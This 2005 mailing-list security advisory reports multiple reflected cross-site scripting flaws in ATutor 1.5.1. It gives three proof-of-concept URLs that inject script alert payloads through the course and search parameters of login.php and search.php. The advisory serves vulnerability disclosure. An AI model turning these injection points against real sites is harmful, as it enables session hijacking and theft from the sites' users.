lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <68cbfab10508180407416a9e10@mail.gmail.com> Date: Thu Aug 18 12:07:38 2005 From: h4cky0u.org at gmail.com (h4cky0u) Subject: ATutor 1.5.1 and prior multiple XSS Vulnerabilities ATutor 1.5.1 and prior multiple XSS Vulnerabilities SEVERITY: ========= Medium SOFTWARE: ========= ATutor 1.5.1 http://www.atutor.ca/ INFO: ===== ATutor 1.5.1 is a web based education portal. DESCRIPTION: ============ The system is vulnerable to various XSS attacks: --==XSS==-- Some examples - http://localhost/tour/login.php?course="><script>alert('Matrix_Killer r0X');</script> http://localhost/tour/search.php?search=1&search=1&words="><script>alert('There is no other place like 127.0.0.1');</script>&include=all&find_in=all&display_as=pages http://localhost/tour/search.php?search=1&words="><script>alert('Found By matrix_killer');</script>&include=all&find_in=all&display_as=pages&submit=Search VENDOR STATUS: ============== Vendor was contacted but no response received till date. CREDITS: ======== This vulnerability was discovered and researched by matrix_killer of h4cky0u Security Forums. mail : matrix_k at abv.bg web : http://www.h4cky0u.org Co-Researcher: h4cky0u of h4cky0u Security Forums. mail : h4cky0u at gmail.com web : http://www.h4cky0u.org Greets to all omega-team members + krassswr,EcLiPsE and all who support us !!! ORIGINAL: ========= http://h4cky0u.org/viewtopic.php?t=2094 -- http://www.h4cky0u.org (In)Security at its best...